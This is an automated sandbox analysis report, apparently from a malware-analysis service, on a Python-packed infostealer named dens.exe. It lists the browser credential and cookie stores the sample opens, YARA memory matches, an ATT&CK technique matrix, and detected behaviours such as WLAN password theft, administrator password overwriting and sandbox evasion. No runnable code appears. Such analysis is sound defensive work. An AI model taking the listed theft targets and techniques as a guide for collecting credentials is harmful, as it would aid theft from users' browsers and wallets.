            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.filesJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\TempJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumpsJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98aJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.defaultJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idbJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeeaJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BookmarksJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporaryJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashesJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\defaultJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.filesJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backupsJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removedJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storageJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_stateJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibagJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmpJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.filesJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\dbJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\gleanJump to behavior
            Source: Yara matchFile source: 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029534944.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dens.exe PID: 6500, type: MEMORYSTR
            Source: Yara matchFile source: 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029534944.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dens.exe PID: 6500, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029534944.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dens.exe PID: 6500, type: MEMORYSTR
            Source: Yara matchFile source: 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029534944.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dens.exe PID: 6500, type: MEMORYSTR
            Source: Yara matchFile source: 00000001.00000002.2065840067.000002D9AC8B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029534944.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dens.exe PID: 6500, type: MEMORYSTR
            Source: Yara matchFile source: 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029534944.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dens.exe PID: 6500, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Valid Accounts
            341
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            2
            Disable or Modify Tools
            1
            OS Credential Dumping
            12
            System Time Discovery
            Remote Services1
            Archive Collected Data
            3
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            Data Encrypted for Impact
            CredentialsDomainsDefault Accounts1
            Native API
            1
            Valid Accounts
            1
            Valid Accounts
            11
            Deobfuscate/Decode Files or Information
            1
            GUI Input Capture
            2
            System Network Connections Discovery
            Remote Desktop Protocol3
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts12
            Command and Scripting Interpreter
            1
            Windows Service
            1
            Windows Service
            2
            Obfuscated Files or Information
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            GUI Input Capture
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Service Execution
            Login Hook11
            Process Injection
            1
            Timestomp
            NTDS56
            System Information Discovery
            Distributed Component Object Model1
            Email Collection
            5
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts2
            PowerShell
            Network Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets571
            Security Software Discovery
            SSH1
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            Masquerading
            Cached Domain Credentials2
            Process Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Valid Accounts
            DCSync151
            Virtualization/Sandbox Evasion
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
            Virtualization/Sandbox Evasion
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
            Process Injection
            /etc/passwd and /etc/shadow1
            Remote System Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing31
            System Network Configuration Discovery
            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1554825 Sample: dens.exe Startdate: 13/11/2024 Architecture: WINDOWS Score: 100 89 store1.gofile.io 2->89 91 raw.githubusercontent.com 2->91 93 3 other IPs or domains 2->93 103 Suricata IDS alerts for network traffic 2->103 105 Sigma detected: Capture Wi-Fi password 2->105 107 Multi AV Scanner detection for dropped file 2->107 109 9 other signatures 2->109 10 dens.exe 243 2->10         started        14 svchost.exe 2->14         started        signatures3 process4 file5 75 C:\Users\...\_quoting_c.cp312-win_amd64.pyd, PE32+ 10->75 dropped 77 C:\Users\...\_helpers_c.cp312-win_amd64.pyd, PE32+ 10->77 dropped 79 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 10->79 dropped 81 74 other files (none is malicious) 10->81 dropped 127 Modifies the windows firewall 10->127 129 Tries to harvest and steal WLAN passwords 10->129 131 Found pyInstaller with non standard icon 10->131 133 Gathers network related connection and port information 10->133 16 dens.exe 140 10->16         started        signatures6 process7 dnsIp8 83 ip-api.com 208.95.112.1, 49740, 80 TUT-ASUS United States 16->83 85 raw.githubusercontent.com 185.199.108.133, 443, 49757 FASTLYUS Netherlands 16->85 87 5 other IPs or domains 16->87 67 C:\Users\user\AppData\Local\...\Waltuhium.exe, PE32+ 16->67 dropped 69 C:\Users\user\AppData\...\XZXHAVGRAG.xlsx, ASCII 16->69 dropped 71 C:\Users\user\AppData\...\XZXHAVGRAG.docx, ASCII 16->71 dropped 73 8 other malicious files 16->73 dropped 95 Found many strings related to Crypto-Wallets (likely being stolen) 16->95 97 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->97 99 Tries to harvest and steal browser information (history, passwords, etc) 16->99 101 4 other signatures 16->101 21 cmd.exe 1 16->21         started        24 cmd.exe 16->24         started        26 cmd.exe 1 16->26         started        28 15 other processes 16->28 file9 signatures10 process11 signatures12 111 Encrypted powershell cmdline option found 21->111 113 Bypasses PowerShell execution policy 21->113 115 Uses netstat to query active network connections and open ports 21->115 125 3 other signatures 21->125 43 2 other processes 21->43 117 Overwrites the password of the administrator account 24->117 119 Gathers network related connection and port information 24->119 121 Performs a network lookup / discovery via ARP 24->121 30 systeminfo.exe 24->30         started        33 net.exe 24->33         started        35 net.exe 24->35         started        45 16 other processes 24->45 37 WMIC.exe 1 26->37         started        39 conhost.exe 26->39         started        123 Tries to harvest and steal WLAN passwords 28->123 41 cmd.exe 28->41         started        47 28 other processes 28->47 process13 signatures14 135 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 30->135 49 WmiPrvSE.exe 30->49         started        137 Overwrites the password of the administrator account 33->137 51 net1.exe 33->51         started        53 net1.exe 35->53         started        139 Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes) 37->139 141 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 37->141 55 chcp.com 41->55         started        57 quser.exe 45->57         started        59 net1.exe 45->59         started        61 net1.exe 45->61         started        63 net1.exe 45->63         started        65 chcp.com 47->65         started        process15

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            dens.exe39%ReversingLabsWin64.Infostealer.Generic
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\_MEI62482\VCRUNTIME140.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\VCRUNTIME140_1.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\_asyncio.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\_brotli.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\_bz2.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\_cffi_backend.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\_ctypes.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\_decimal.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\_hashlib.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\_lzma.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\_multiprocessing.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\_overlapped.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\_queue.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\_socket.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\_sqlite3.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\_ssl.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\_uuid.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\_wmi.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp\_helpers.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp\_http_parser.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp\_http_writer.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp\_websocket.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
